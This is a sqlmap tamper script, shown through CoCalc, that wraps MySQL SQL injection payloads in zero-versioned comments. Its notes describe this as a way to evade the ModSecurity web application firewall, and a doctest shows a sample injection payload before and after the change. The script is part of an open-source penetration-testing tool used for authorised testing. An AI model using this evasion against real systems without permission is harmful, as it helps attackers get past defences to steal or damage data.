CoCalc -- modsecurityzeroversioned.py

GitHub Repository: sqlmapproject/sqlmap
Path: blob/master/tamper/modsecurityzeroversioned.py
²⁹⁸³ views

1
#!/usr/bin/env python
2

3
"""
4
Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
5
See the file 'LICENSE' for copying permission
6
"""
7

8
import os
9

10
from lib.core.common import singleTimeWarnMessage
11
from lib.core.enums import DBMS
12
from lib.core.enums import PRIORITY
13

14
__priority__ = PRIORITY.HIGHER
15

16
def dependencies():
17
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
18

19
def tamper(payload, **kwargs):
20
    """
21
    Embraces complete query with (MySQL) zero-versioned comment
22

23
    Requirement:
24
        * MySQL
25

26
    Tested against:
27
        * MySQL 5.0
28

29
    Notes:
30
        * Useful to bypass ModSecurity WAF
31

32
    >>> tamper('1 AND 2>1--')
33
    '1 /*!00000AND 2>1*/--'
34
    """
35

36
    retVal = payload
37

38
    if payload:
39
        postfix = ''
40
        for comment in ('#', '--', '/*'):
41
            if comment in payload:
42
                postfix = payload[payload.find(comment):]
43
                payload = payload[:payload.find(comment)]
44
                break
45
        if ' ' in payload:
46
            retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
47

48
    return retVal
49

50

Product

Resources

Company